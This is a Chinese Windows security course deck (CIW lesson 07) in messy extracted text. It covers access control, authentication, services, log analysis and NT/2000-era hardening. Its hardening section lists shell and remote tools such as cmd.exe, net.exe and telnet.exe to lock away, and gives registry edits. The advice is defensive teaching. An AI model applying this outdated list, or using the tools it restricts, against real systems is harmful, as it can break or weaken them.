《CIWwindows系统安全07课件》由会员分享,可在线阅读,更多相关《CIWwindows系统安全07课件(220页珍藏版)》请在金锄头文库上搜索。
1、操作系统安全Windows 系统安全(一)CIWwindows系统安全(07)内容提要系统安全概述Windows系统安全机制安全部署Windows系统CIWwindows系统安全(07)1.系统安全概述安全级别度量标准:TrustedComputerSystemEvaluationCriteria(1985)系统安全程度的七个等级:(D1、C1、C2、B1、B2、B3、A1)CIWwindows系统安全(07)级别描述D最低的级别。如MS-DOS,没有安全性可言C1灵活的安全保护。系统不需要区分用户。可提供基本的访问控制。C2灵活的访问安全性。系统不仅要识别用户还要考虑唯一性。系统级的保护主要
2、存在于资源、数据、文件和操作上。如WindowsNT。B1标记安全保护。系统提供更多的保护措施,包括各种的安全级别。如AT&T的SYSTEMV、UNIXwithMLS,以及IBMMVS/ESA。B2结构化保护。支持硬件保护。内容区被虚拟分割并严格保护。如TrustedXENIX和HoneywellMULTICS。B3安全域。支持数据隐藏和分层,可以阻止层之间的交互。如HoneywellXTS-200。A校验级设计。需要严格的准确证明系统不会被伤害,而且提供所有低级别的因素。如HoneywellSCOMP。CIWwindows系统安全(07)1.系统安全概述脆弱性分析技术的脆弱性配置的脆弱性管理
3、的脆弱性CIWwindows系统安全(07)2.1Windows系统的安全架构2.2Windows的安全子系统2.3Windows的账户及密码系统2.4Windows的权利与权限2.5Windows的系统服务和进程2.6Windows的日志系统2.Windows系统安全机制CIWwindows系统安全(07)2.1Windows系统的安全架构6 6个主要的安全服务:个主要的安全服务:个主要的安全服务:个主要的安全服务:Audit,Administration,Audit,Administration,Encryption,AccessControl,UserAuthentication,Enc
4、ryption,AccessControl,UserAuthentication,CorporateSecurityPolicyCorporateSecurityPolicy。 CIWwindows系统安全(07)C2级别的操作系统中所包含的安全组件:访问控制的判断(Discretionaccesscontrol)Windows支持对象的访问控制的判断。这些需求包括允许对象支持对象的访问控制的判断。这些需求包括允许对象的所有者可以控制谁被允许访问该对象以及访问的方式。的所有者可以控制谁被允许访问该对象以及访问的方式。对象重用(Objectreuse)当资源(内存、磁盘等)被某应用访问时,当资源
5、(内存、磁盘等)被某应用访问时,Windows禁止所有禁止所有的系统应用访问该资源,这也就是为什么的系统应用访问该资源,这也就是为什么WindowsNT禁止禁止undelete已经被删除的文件的原因。已经被删除的文件的原因。强制登陆(Mandatorylogon)与与WindowsforWorkgroups,Windwows95,Windows98不不同,同,Windows2K/NT要求所有的用户必须登陆,通过认证后才可要求所有的用户必须登陆,通过认证后才可以访问资源。由于网络连接缺少强制的认证,所以以访问资源。由于网络连接缺少强制的认证,所以Windows作为作为C2级别的操作系统必须是未连
6、网的。级别的操作系统必须是未连网的。2.1.1Windows系统的安全组件CIWwindows系统安全(07)审核(Auditing)WindowsNT在控制用户访问资源的同时,也可以对这些访问在控制用户访问资源的同时,也可以对这些访问作了相应的记录。作了相应的记录。对象的访问控制(Controlofaccesstoobject)WindowsNT不允许直接访问系统的某些资源。必须是该资源允不允许直接访问系统的某些资源。必须是该资源允许被访问,然后是用户或应用通过第一次认证后再访问。许被访问,然后是用户或应用通过第一次认证后再访问。2.1.1Windows系统的安全组件CIWwindows系统
7、安全(07)为了实现自身的安全特性,Windows2K/NT把所有的资源作为系统的特殊的对象。这些对象包含资源本身,Windows2K/NT提供了一种访问机制去使用它们。Microsoft的安全就是基于以下的法则:C用对象表现所有的资源C只有Windows2K/NT才能直接访问这些对象C对象能够包含所有的数据和方法C对象的访问必须通过Windows2K/NT的安全子系统的第一次验证C存在几种单独的对象,每一个对象的类型决定了这些对象能做些什么Windows中首要的对象类型有:文件文件夹打印机I/O设备窗口线程进程内存这些安全构架的目标就是实现系统的牢固性。从设计来考虑,就是所有的访问都必须通过
8、同一种方法认证,减少安全机制被绕过的机会。2.1.2Windows系统的对象CIWwindows系统安全(07)2.2Windows安全子系统CIWwindows系统安全(07)WindowsNT安全子系统包含五个关键的组件:安全子系统包含五个关键的组件:Securityidentifiers,Accesstokens,Securitydescriptors,Accesscontrollists,AccessControlEntries。安全标识符(SecurityIdentifiers):就是我们经常说的就是我们经常说的SID,每次当我们创建一个用户或一个组的时候,每次当我们创建一个用户或一
9、个组的时候,系统会分配给改用户或组一个唯一系统会分配给改用户或组一个唯一SID,当你重新安装,当你重新安装WindowsNT后,后,也会得到一个唯一的也会得到一个唯一的SID。SID永远都是唯一的,由计算机名、当前时间、当前用户态线程的永远都是唯一的,由计算机名、当前时间、当前用户态线程的CPU耗费时间的总和三个参数决定以保证它的唯一性。耗费时间的总和三个参数决定以保证它的唯一性。例:例:S-1-5-21-17632321-500访问令牌(Accesstokens):用户通过验证后,登陆进程会给用户一个访问令牌,该令牌相当于用户通过验证后,登陆进程会给用户一个访问令牌,该令牌相当于用户访问系统
10、资源的票证,当用户试图访问系统资源时,将访问令牌提用户访问系统资源的票证,当用户试图访问系统资源时,将访问令牌提供给供给WindowsNT,然后,然后WindowsNT检查用户试图访问对象上的访问检查用户试图访问对象上的访问控制列表。如果用户被允许访问该对象,控制列表。如果用户被允许访问该对象,WindowsNT将会分配给用户将会分配给用户适当的访问权限。适当的访问权限。访问令牌是用户在通过验证的时候有登陆进程所提供的,所以改变访问令牌是用户在通过验证的时候有登陆进程所提供的,所以改变用户的权限需要注销后重新登陆,重新获取访问令牌。用户的权限需要注销后重新登陆,重新获取访问令牌。2.2.1Wi
11、ndows安全子系统的组件CIWwindows系统安全(07)安全描述符(Securitydescriptors):WindowsNT中的任何对象的属性都有安全描述符这部分。它中的任何对象的属性都有安全描述符这部分。它保存对象的安全配置。保存对象的安全配置。访问控制列表(Accesscontrollists):访问控制列表有两种:任意访问控制列表(访问控制列表有两种:任意访问控制列表(DiscretionaryACL)、系统访问控制列表()、系统访问控制列表(SystemACL)。任意访问控制列)。任意访问控制列表包含了用户和组的列表,以及相应的权限,允许或拒绝。每一表包含了用户和组的列表,以
12、及相应的权限,允许或拒绝。每一个用户或组在任意访问控制列表中都有特殊的权限。而系统访问个用户或组在任意访问控制列表中都有特殊的权限。而系统访问控制列表是为审核服务的,包含了对象被访问的时间。控制列表是为审核服务的,包含了对象被访问的时间。访问控制项(Accesscontrolentries):访问控制项(访问控制项(ACE)包含了用户或组的)包含了用户或组的SID以及对象的权限。访以及对象的权限。访问控制项有两种:允许访问和拒绝访问。拒绝访问的级别高于允问控制项有两种:允许访问和拒绝访问。拒绝访问的级别高于允许访问。许访问。当你使用管理工具列出对象的访问权限时,列表的排序是以文当你使用管理工具
13、列出对象的访问权限时,列表的排序是以文字为顺序的,它并不象防火墙的规则那样由上往下的,不过好在字为顺序的,它并不象防火墙的规则那样由上往下的,不过好在并不会出现冲突,拒绝访问总是优先于允许访问的。并不会出现冲突,拒绝访问总是优先于允许访问的。2.2.1Windows安全子系统的组件CIWwindows系统安全(07)CWinlogonCGraphicalIdentificationandAuthenticationDLL(GINA)CLocalSecurityAuthority(LSA)CSecuritySupportProviderInterface(SSPI)CAuthentication
14、PackagesCSecuritysupportprovidersCNetlogonServiceCSecurityAccountManager(SAM)2.2.2Windows安全子系统的身份认证CIWwindows系统安全(07)2.2.2Windows安全子系统的身份认证WinlogonGINALSASecurityAccountManagementNetlogonAuthenticationPackagesSecuritySupportProviderSSPI加载GINA,监视认证顺序加载认证包支持额外的验证机制为认证建立安全通道提供登陆接口提供真正的用户校验管理用户和用户证书的数据库
15、Winlogon,LocalSecurityAuthorit以及以及Netlogon作为作为服务运行,其他的以服务运行,其他的以DLL方式被这些文件调用。方式被这些文件调用。CIWwindows系统安全(07)2.2.2Windows安全子系统的身份认证WinlogonandGina:Winlogon调用GINADLL,并监视安全认证序列。而GINADLL提供一个交互式的界面为用户登陆提供认证请求。GINADLL被设计成一个独立的模块,当然我们也可以用一个更加强有力的认证方式(指纹、视网膜)替换内置的GINADLL。Winlogon在注册表中查找HKLMSoftwareMicrosoftWin
16、dowsNTCurrentVersionWinlogon,如果存在GinaDLL键,Winlogon将使用这个DLL,如果不存在该键,Winlogon将使用默认值MSGINA.DLLCCIWwindows系统安全(07)2.2.2Windows安全子系统的身份认证本地安全认证(LocalSecurityAuthority):本地安全认证(LSA)是一个被保护的子系统,它负责以下任务:调用所有的认证包,检查在注册表HKLMSYSTEMCurrentControlSetControlLSA下AuthenticationPAckages下的值,并调用该DLL进行认证(MSV_1.DLL)。在4.0版
17、里,WindowsNT会寻找HKLMSYSTEMCurrentControlSetControlLSA下所有存在的SecurityPackages值并调用。重新找回本地组的SIDs和用户的权限。创建用户的访问令牌。管理本地安装的服务所使用的服务账号。储存和映射用户权限。管理审核的策略和设置。管理信任关系。CIWwindows系统安全(07)2.2.2Windows安全子系统的身份认证安全支持提供者的接口(SecuritySupportProvideInterface):微软的SecuritySupportProvideInterface很简单地遵循RFC2743和RFC2744的定义,提供一些
18、安全服务的API,为应用程序和服务提供请求安全的认证连接的方法(Kerberos/NTLM)。认证包(AuthenticationPackage):认证包可以为真实用户提供认证。通过GINADLL的可信认证后,认证包返回用户的SIDs给LSA,然后将其放在用户的访问令牌中。CIWwindows系统安全(07)2.2.2Windows安全子系统的身份认证安全支持提供者(SecuritySupportProvider):安全支持提供者是以驱动的形式安装的,能够实现一些附加的安全机制,默认情况下,WindowsNT安装了以下三种:Msnsspc.dll:微软网络挑战/反应认证模块Msapsspc.d
19、ll:分布式密码认证挑战/反应模块,该模块也可以在微软网络中使用Schannel.dll:该认证模块使用某些证书颁发机构提供的证书来进行验证,常见的证书机构比如Verisign。这种认证方式经常在使用SSL(SecureSocketsLayer)和PCT(PrivateCommunicationTechnology)协议通信的时候用到。CIWwindows系统安全(07)2.2.2Windows安全子系统的身份认证网络登陆(Netlogon):网络登陆服务必须在通过认证后建立一个安全的通道。要实现这个目标,必须通过安全通道与域中的域控制器建立连接,然后,再通过安全的通道传递用户的口令,在域的域
20、控制器上响应请求后,重新取回用户的SIDs和用户权限。安全账号管理者(SecurityAccountManager):安全账号管理者,也就是我们经常所说的SAM,它是用来保存用户账号和口令的数据库。保存了注册表中HKLMSecuritySam中的一部分内容。不同的域有不同的Sam,在域复制的过程中,Sam包将会被拷贝。CIWwindows系统安全(07)2.2.3Windows身份认证机制LanManager认证(称为LM协议)C早期版本NTLMv1认证协议CNT4.0SP3之前的版本NTLMv2认证协议CNT4.0SP4开始支持Kerberosv5认证协议CWindows2000活动目录CI
21、Wwindows系统安全(07)2.2.3NTLMNTLM身份认证过程是:1、客户端首先在本地加密自己的密码成为密码散列2、客户端向服务器发送自己的帐号,这个帐号是没有经过加密的,明文直接传输。3、服务器产生一个16位的随机数字发送给客户端,作为一个challenge4、客户端再用加密后的密码散列来加密这个challenge,然后把这个返回给服务器。作为response。5、服务器把用户名、给客户端的challenge、客户端返回的response这三个东西,发送域控制器6、域控制器用这个用户名在SAM密码管理库中找到这个用户的密码散列,然后使用这个密码散列来加密challenge。7、域控制
22、器比较两次加密的challenge,如果一样,那么认证成功。CIWwindows系统安全(07)2.2.3KerberosV5CIWwindows系统安全(07)2.2.3活动目录的逻辑结构contoso.msft(root)au.contoso.msftasia.contoso.msft目录树目录树双向可传递信双向可传递信双向可传递信双向可传递信 任任任任au.nwtraders.msftasia.nwtraders.msftnwtraders.msft目录林目录林目录树目录树双向可传递信双向可传递信双向可传递信双向可传递信 任任任任CIWwindows系统安全(07)2.2.3Kerber
23、osV5contoso.msftmarketing.contoso.msft目录林根域目录林根域KDCnwtraders.msftKDC服务器服务器KDCsales.nwtraders.msft客户机客户机KDCKerberos验证验证2 2会话会话凭证凭证1 13 34 45 5CIWwindows系统安全(07)2.3Windows的账户及密码系统windowsNT及win2000中对用户帐户的安全管理使用了安全帐号管理器(securityaccountmanager)的机制,安全帐号管理器对帐号的管理是通过安全标识进行的,安全标识在帐号创建时就同时创建,一旦帐号被删除,安全标识也同时被删
24、除。安全标识是唯一的,即使是相同的用户名,在每次创建时获得的安全标识都时完全不同的。因此,一旦某个帐号被删除,它的安全标识就不再存在了,即使用相同的用户名重建帐号,也会被赋予不同的安全标识,不会保留原来的权限。CIWwindows系统安全(07)2.4Windows的权利和权限网络安全性依赖于给用户或组授予的能力:权利:在系统上完成特定动作的授权,一般由系统指定给内置组,但也可以由管理员将其扩大到组和用户上。权限:用户或组对于文件系统的访问能力。共享:用户可以通过网络使用的文件夹。CIWwindows系统安全(07)权利适用于对整个系统范围内的对象和任务的操作,通常是用来授权用户执行某些系统任
25、务。当用户登录到一个具有某种权利的帐号时,该用户就可以执行与该权利相关的任务。下面列出了用户的特定权利:Accessthiscomputerfromnetwork可使用户通过网络访问该计算机。Addworkstationtoadomain允许用户将工作站添加到域中。Backupfilesanddirectories授权用户对计算机的文件和目录进行备份。Changethesystemtime用户可以设置计算机的系统时钟。Loadandunloaddevicedrive允许用户在网络上安装和删除设备的驱动程序。Restorefilesanddirectories允许用户恢复以前备份的文件和目录。S
26、hutdownthesystem允许用户关闭系统。2.4.1Windows系统的用户权利CIWwindows系统安全(07)权限适用于对特定对象如目录和文件(只适用于NTFS卷)的操作,指定允许哪些用户可以使用这些对象,以及如何使用(如把某个目录的访问权限授予指定的用户)。权限分为目录权限和文件权限,每一个权级别都确定了一个执行特定的任务组合的能力,这些任务是:Read(R)、Execute(X)、Write(W)、Delete(D)、SetPermission(P)和TakeOwnership(O)。下表显示了这些任务是如何与各种权限级别相关联的。2.4.2Windows系统的用户权限CIW
27、windows系统安全(07)目录权限权限级别权限级别RXWDPO允许的用户动作允许的用户动作NoAccess用户不能访问该目录ListRX可以查看目录中的子目录和文件名,也可以进入其子目录ReadRX具有List权限,用户可以读取目录中的文件和运行目录中的应用程序AddXW用户可以添加文件和子录AddandReadRXW具有Read和Add的权限ChangeRXWD有Add和Read的权限,另外还可以更改文件的内容,删除文件和子目录FullcontrolRXWDPO有Change的权限,另外用户可以更改权限和获取目录的所有权如果对目录有Execute(X)权限,表示可以穿越目录,进入其子目。
28、2.4.2Windows系统的用户权限CIWwindows系统安全(07)文件权限权限级别权限级别RXWDPO允许的用户动作允许的用户动作NoAccess用户不能访问该文件ReadRX用户可以读取该文件,如果是应用程序可以运行ChangeRXWD有Read的权限,还可用修和删除文件FullcontrolRXWDPO包含Change的权限,还可以更改权限和获取文件的有权2.4.2Windows系统的用户权限CIWwindows系统安全(07)共享只适用于文件夹(目录),如果文件夹不是共享的,那么在网络上就不会有用户看到它,也就更不能访问。网络上的绝大多数服务器主要用于存放可被网络用户访问的文件和
29、目录,要使网络用户可以访问在NTServer服务器上的文件和目录,必须首先对它建立共享。共享权限建立了通过网络对共享目录访问的最高级别。2.4.3Windows系统的共享权限CIWwindows系统安全(07)下表列出从最大限制到最小限制的共享权限。共享权限级别共享权限级别允许的用户动作允许的用户动作NoAccess(不能访问)禁止对目录和其中的文件及子目录进行访问但允许查看文件名和子目录名,改变共享Read(读)目录的子目录,还允许查看文件的数据和运行应用程序Change(更改)具有“读”权限中允许的操作,另外允许往目录中添加文件和子目录,更改文数据,删除文件和子目录Fullcontrol(
30、完全控制)具有“更改”权限中允许的操作,另外还允许更改权限(只适用于NTFS卷)和获所有权(只适用于NTFS卷)共享点一定要小心地分配。因为权限仅仅是分配给共享点的,任何共享点下的文件:或目录都足以和共享点本身相同的权限被访问的。2.4.3Windows系统的共享权限CIWwindows系统安全(07)单击“开始”,指向“设置”,然后单击“控制面板”。双击“管理工具”,然后双击“服务”。在列表框中显示的是系统可以使用的服务。Windows2k下可以在命令行中输入services.msc打开服务列表。2.5.1Windows的系统服务CIWwindows系统安全(07)服务包括三种启动类型:自动
31、,手动,已禁用。自动-Windows2000启动的时候自动加载服务手动-Windows2000启动的时候不自动加载服务,在需要的时候手动开启已禁用-Windows2000启动的时候不自动加载服务,在需要的时候选择手动或者自动方式开启服务,并重新启动电脑完成服务的配置双击需要进行配置的服务,出现下图所示的属性对话框:2.5.1Windows的系统服务CIWwindows系统安全(07)C在HKEY_LOCAL_MACHINESYSTEMCurrentControlSetService底下每一笔服务项目子项都有一个Start数值,这个数值的内容依照每一个服务项目的状况而又有不同。Start数值内容
32、所记录的就是服务项目驱动程式该在何时被加载。C目前微软对Start内容的定义有0、1、2、3、4等五种状态,0、1、2分别代表Boot、System、AutoLoad等叁种意义。而Start数值内容为3的服务项目代表让使用者以手动的方式载入(Loadondemand),4则是代表停用的状态,也就是禁用。2.5.1Windows的系统服务CIWwindows系统安全(07)基本的系统进程smss.exeSessionManagercsrss.exe子系统服务器进程winlogon.exe管理用户登录services.exe包含很多系统服务lsass.exe管理IP安全策略以及启动ISAKMP/O
33、akley(IKE)和IP安全驱动程序。(系统服务)svchost.exe包含很多系统服务spoolsv.exe将文件加载到内存中以便迟后打印。(系统服务)explorer.exe资源管理器internat.exe输入法2.5.2Windows的系统进程CIWwindows系统安全(07)附加的系统进程(这些进程不是必要的)mstask.exe允许程序在指定时间运行。(系统服务)regsvc.exe允许远程注册表操作。(系统服务)winmgmt.exe提供系统管理信息(系统服务)。inetinfo.exe通过Internet信息服务的管理单元提供FTP连接和管理。(系统服务)tlntsvr.e
34、xe允许远程用户登录到系统并且使用命令行运行控制台程序。(系统服务)termsrv.exe提供多会话环境允许客户端设备访问虚拟的Windows2000Professional桌面会话以及运行在服务器上的基于Windows的程序。(系统服务)dns.exe应答对域名系统(DNS)名称的查询和更新请求。(系统服务)2.5.2Windows的系统进程CIWwindows系统安全(07)tcpsvcs.exe提供在PXE可远程启动客户计算机上远程安装Windows2000Professional的能力。(系统服务)ismserv.exe允许在WindowsAdvancedServer站点间发送和接收消
35、息。(系统服务)ups.exe管理连接到计算机的不间断电源(UPS)。(系统服务)wins.exe为注册和解析NetBIOS型名称的TCP/IP客户提供NetBIOS名称服务。(系统服务)llssrv.exeLicenseLoggingService(systemservice)ntfrs.exe在多个服务器间维护文件目录内容的文件同步。(系统服务)RsSub.exe控制用来远程储存数据的媒体。(系统服务)locator.exe管理RPC名称服务数据库。(系统服务)2.5.2Windows的系统进程CIWwindows系统安全(07)lserver.exe注册客户端许可证。(系统服务)dfss
36、vc.exe管理分布于局域网或广域网的逻辑卷。(系统服务)clipsrv.exe支持“剪贴簿查看器”,以便可以从远程剪贴簿查阅剪贴页面。(系统服务)msdtc.exe并列事务,是分布于两个以上的数据库,消息队列,文件系统,或其它事务保护资源管理器。(系统服务)faxsvc.exe帮助您发送和接收传真。(系统服务)cisvc.exeIndexingService(systemservice)dmadmin.exe磁盘管理请求的系统管理服务。(系统服务)mnmsrvc.exe允许有权限的用户使用NetMeeting远程访问Windows桌面。(系统服务)netdde.exe提供动态数据交换(DDE
37、)的网络传输和安全特性。(系统服务)smlogsvc.exe配置性能日志和警报。(系统服务)rsvp.exe为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功能。(系统服务)RsEng.exe协调用来储存不常用数据的服务和管理工具。(系统服务)RsFsa.exe管理远程储存的文件的操作。(系统服务)2.5.2Windows的系统进程CIWwindows系统安全(07)grovel.exe扫描零备份存储(SIS)卷上的重复文件,并且将重复文件指向一个数据存储点,以节省磁盘空间。(系统服务)SCardSvr.exe对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。(
38、系统服务)snmp.exe包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。(系统服务)snmptrap.exe接收由本地或远程SNMP代理程序产生的陷阱消息,然后将消息传递到运行在这台计算机上SNMP管理程序。(系统服务)UtilMan.exe从一个窗口中启动和配置辅助工具。(系统服务)msiexec.exe依据.MSI文件中包含的命令来安装、修复以及删除软件。(系统服务)2.5.2Windows的系统进程CIWwindows系统安全(07)Windows有三种类型的事件日志:系统日志跟踪各种各样的系统事件,比如跟踪系统启动过程中的事件或者硬件和控制器的故障。应用程序日志跟踪应用
39、程序关联的事件,比如应用程序产生的象装载DLL(动态链接库)失败的信息将出现在日志中。安全日志跟踪事件如登录上网、下网、改变访问权限以及系统启动和关闭。注意:安全日志的默认状态是关闭的。2.6Windows的Log系统CIWwindows系统安全(07)2.6Windows的Log系统日志在系统的位置是:C%SYSTEMROOT%system32configSysEvent.EvtC%SYSTEMROOT%system32configSecEvent.EvtC%SYSTEMROOT%system32configAppEvent.EvtCLOG文件在注册表的位置是:CHKEY_LOCAL_MAC
40、HINESystemCurrentControlSetServicesEventlogCIWwindows系统安全(07)2.6Windows的应用系统日志Internet信息服务FTP日志默认位置:%systemroot%system32/log,默认每天一个日志Internet信息服务WWW日志默认位置:%systemroot%system32/log,默认每天一个日志FTP日志和WWW日志文件名通常为ex(年份)(月份)(日期),例如ex001023,就是2000年10月23日产生的日志,用记事本就可直接打开Scheduler服务日志默认位置:%systemroot%schedlgu.t
41、xtCIWwindows系统安全(07)2.6FTP日志分析FTP日志分析,如下例:#Software:MicrosoftInternetInformationServices5.0(微软IIS5.0)#Version:1.0(版本1.0)#Date:2000102303:11:55(服务启动时间日期)03:11:55127.0.0.11USERadministator331(IP地址为127.0.0.1用户名为administator试图登录)03:11:58127.0.0.11PASS530(登录失败)03:12:04127.0.0.11USERnt331(IP地址为127.0.0.1用户
42、名为nt的用户试图登录)03:12:06127.0.0.11PASS530(登录失败)03:12:32127.0.0.11USERadministrator331(IP地址为127.0.0.1用户名为administrator试图登录)03:12:34127.0.0.11PASS230(登录成功)03:12:41127.0.0.11MKDnt550(新建目录失败)03:12:45127.0.0.11QUIT550(退出FTP程序)从日志里就能看出IP地址为127.0.0.1的用户一直试图登录系统,换了3次用户名和密码才成功,管理员立即就可以得知管理员的入侵时间IP地址以及探测的用户名。CIWw
43、indows系统安全(07)2.6HTTP的日志分析HTTP日志分析,如下例:#Software:MicrosoftInternetInformationServices5.0#Version:1.0#Date:2000102303:09:31#Fields:datetimecipcsusernamesipsportcsmethodcsuristemcsuriqueryscstatuscs(UserAgent)2000102303:09:31192.168.1.26192.168.1.3780GET/iisstart.asp200Mozilla/4.0+(compatible;+MSIE+5.
44、0;+Windows+98;+DigExt)2000102303:09:34192.168.1.26192.168.1.3780GET/pagerror.gif200Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)通过分析第六行,可以看出2000年10月23日,IP地址为192.168.1.26的用户通过访问IP地址为192.168.1.37机器的80端口,查看了一个页面iisstart.asp,这位用户的浏览器为compatible;+MSIE+5.0;+Windows+98+DigExt,有经验的管理员就可通过安全日志、FTP日志
45、和WWW日志来确定入侵者的IP地址以及入侵时间CIWwindows系统安全(07)3.安全部署Windows系统3.1安装3.2审核系统安全性3.3访问控制3.4账号安全策略3.5管理员权限3.6文件系统安全3.7网络服务(IIS和NetBIOS的安全设置)3.8安全日志3.9组策略3.10安全工具简介CIWwindows系统安全(07)3.1安装使用正版可靠安装盘使用正版可靠安装盘 将系统安装在将系统安装在NTFSNTFS分区上分区上 系统和数据要分开存放在不同的磁盘系统和数据要分开存放在不同的磁盘 最少建立两个分区,一个系统分区,一个应用程最少建立两个分区,一个系统分区,一个应用程序分区,
46、因为微软的序分区,因为微软的IIS经常会有泄漏源码经常会有泄漏源码/溢出溢出的漏洞,如果把系统和的漏洞,如果把系统和IIS放在同一个驱动器会导放在同一个驱动器会导致系统文件的泄漏甚至入侵者远程获取致系统文件的泄漏甚至入侵者远程获取ADMIN。 最小化安装服务(如不需要最小化安装服务(如不需要IISIIS一定不要装)一定不要装) 只安装必需的协议只安装必需的协议CIWwindows系统安全(07)3.1安装NT安装SP6a,安全补丁合集和相关的HotfixWIN2K安装SP3和相关的Hotfix自动安装脚本装其它的服务和应用程序补丁每次在安装其它程序之后,重新应用安全补丁测试网络连通性以及服务、
47、应用程序的可用性备份系统配置文件CIWwindows系统安全(07)3.2审核系统安全性系统安全审核以本地用户的身份来评估系统安全配置。检查病毒和后门检查病毒和后门 检查可疑的访问检查可疑的访问: :用NTLast等审核程序来判断是否有未授权访问。 确认文件系统是确认文件系统是NTFSNTFSCIWwindows系统安全(07)3.2审核系统安全性检查日志记录,查看是否有不寻常事件:使用信号会经常在日志中被记录(如一次被攻击而导致服务不正常).事件日志和其他数据也有相互关系(可疑文件的创建),可以判断攻击的起因和来源。可用管理员工具查看事件记录。注册表安全:重要的安全性控制与注册表有关。经由注
48、册表权限保证注册表项安全,以及使用NTFS权限保证参与注册表数据的所有文件安全。确认ServicePack/HotFixes是最新的CIWwindows系统安全(07)3.3访问控制对Windows服务器的访问应该只允许授权访问,以及可靠用户。另外系统资源应该限制只允许授权用户或是那些日常维护服务器的人员访问。尽量将访问来源控制在最小范围内:CIWwindows系统安全(07)3.3访问控制限制远程登录工作组限制远程登录工作组:从远程工作站登录到一台WINDOWS服务器是通过Microsoft的远程访问服务(RemoteAccessService)服务器.然而,在保护远程工作站上可能会有问题存
49、在,有可能会危及服务器和网络的完整性.只要有可能,RAS就会将它禁止掉。哪里是不可能的,它会将它保护起来。物理上加强服务器安全物理上加强服务器安全:只有授权管理员可以物理访问WindowsNT服务器。包括备份系统和敏感用户文件。为了更长远的考虑,计算机应该有个BIOS的启动密码。禁止多重启动的设置禁止多重启动的设置:多重的启动系统(如WindowsNT在一个扇区而Linux在另一个扇区)会危及到NT文件系统的安全。例如,如果Linux是第二扇区上的系统,一个Linux用户可以绕过所有的访问控制mountNTFS文件系统。CIWwindows系统安全(07)3.4帐户安全策略删除无用或过期帐号删
50、除无用或过期帐号:查看哪些帐号是没有用的或者是已经过期了的,然后将他们删除。检查是否存在空密码的帐号检查是否存在空密码的帐号:查看所有帐号是否有空密码。其中Administrator和Guest帐号要留意。屏幕保护使用密码保护屏幕保护使用密码保护:用密码屏幕保护来增加NT服务器的物理保护。屏幕保护的时间建议是5分钟或更少。设置帐号规则保证帐号安全强大的密码控制和帐号锁定使黑客攻击系统更为困难.CIWwindows系统安全(07)账户和密码的基础性地位决定账户和密码安全性的几个因素C账户的复杂性C账户的时效C密码的复杂性C密码使用的时效3.4账户和密码管理CIWwindows系统安全(07)3.
51、4账户和密码管理强壮密码的组成C大写字母C小写字母C数字C非字母、数字的字符密码长度:不小于8字节长CIWwindows系统安全(07)3.4账户和密码管理个人名字或呢称电话号码、生日等敏感信息输入8字符以上密码记录于纸上或放置于办公处使用重复的字符XXXX+=强壮的密码强壮的密码CIWwindows系统安全(07)3.4账户和密码管理账户锁定策略密码策略CIWwindows系统安全(07)3.4账户和密码管理强制执行密码历史记录强制执行密码历史记录 密码最长期限密码最长期限密码最短期限密码最短期限密码必须符合复杂性要求密码必须符合复杂性要求为域中所有用户使用可还为域中所有用户使用可还原的加密
52、来储存密码原的加密来储存密码24个密码个密码42天天2天天启启 用用禁禁 用用密码策略的推荐设置CIWwindows系统安全(07)3.4账户和密码管理账户锁定策略的推荐设置策 略默认设置推荐最低设置帐户锁定时间未定义30 分钟帐户锁定阈值05 次无效登录复位帐户锁定计数器未定义30 分钟CIWwindows系统安全(07)3.4 其他账户设置不显示最后登录用户姓名CHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonC增添键值DontDisplayLastUserNameC类型REG_SZC数值1CIWwindo
53、ws系统安全(07)3.5管理员权限配置重命名管理员帐号重命名管理员帐号:将Administrator帐号名更名为和其他普通帐号名一样。这可以增加攻击者攻击的复杂度,这样可以避免攻击者猜测管理员密码。检查管理员组成员检查管理员组成员:用NTLAST来确认只有授权的管理组成员可以使用该帐号。尽量减少使用管理员权限的帐号数量。确认密码强度足够确认密码强度足够:使用一个不会被猜出的密码或是不会被暴力破解轻易破解出来的密码。密码应该是随意组合的,没有规律,有大小写字符、数字或着是特殊字符,用14个字符的密码。 CIWwindows系统安全(07)3.6 文件系统安全WFP的英文全称是Windows,即
54、Windows文件保护。它的主要功能是防止系统文件被不匹配的版本替换或是覆盖。在安装新应用程序时,由于不经意间采用了过时的dll(动态链接库)文件最容易使系统文件遭到破坏。微软把Windows2000安装光盘上的所有dll、exe、fon、ocx、sys和tff结尾的文件都加以保护。备份在%SYSTEMROOT%/system32/dllcache文件夹下。CIWwindows系统安全(07)3.6 文件系统安全(使用sfc.exe命令) 当WFP监控到这些文件被覆盖或替换后就要开始自己的工作了。首先它会扫描可能有问题的文件,如果这些文件与备份文件夹内微软“原装”文件不符,WFP会把用SYST
55、EMROOT%/system32/dllcache目录下备份的文件还原。如果该文件没有做备份,系统会提示你插入Windows2000的安装光盘以复原该文件。CIWwindows系统安全(07)3.6 文件系统安全将下列可执行文件放到一个新建的目录D:arrow下cmd.exe(重命名为shell.exe)ping.exeroute.exenet.exewscript.execscript.exearp.execacls.exenetstat.exeregedit.exeregedt32.exenslookup.exetracert.exeipconfig.exesyskey.exeissync
56、.exetskill.exepoledit.exeregsvr32.exetelnet.exeat.exe将此目录进行权限设置删除系统中的如下可执行文件finger.exeedlin.exerunonce.exenetsh.exeregini.exefind.exeCIWwindows系统安全(07)NTFS权限的应用规则C权限是累加的(取大):用户本身权限用户所属多个组的权限C拒绝权限覆盖其他所有权限NTFS权限与共享权限组合C应用其中最严格的权限(取小)移动和复制NTFS权限的影响3.6NTFS权限与共享权限CIWwindows系统安全(07)3.6关闭管理性共享关闭自动打开的管理共享 C
57、HKEY_LOCAL_MACHINECSystemCurrentControlSetServicesLanmanServerParametersC键值AutoShareServerC类型REG_DWORDC数据0CIWwindows系统安全(07)3.6NTFS加密(EFS)NTFS加密(EFS)的意义NTFS加密(EFS)的工作过程密钥生成及备份EFS恢复代理移动和复制对NTFS加密(EFS)的影响CIWwindows系统安全(07)3.7 网络服务限制对外开放的端口限制对外开放的端口:在TCP/IP的高级设置中选择只允许开放特定端口,或者可以考虑使用路由或防火墙来设置。禁用禁用snmp服务
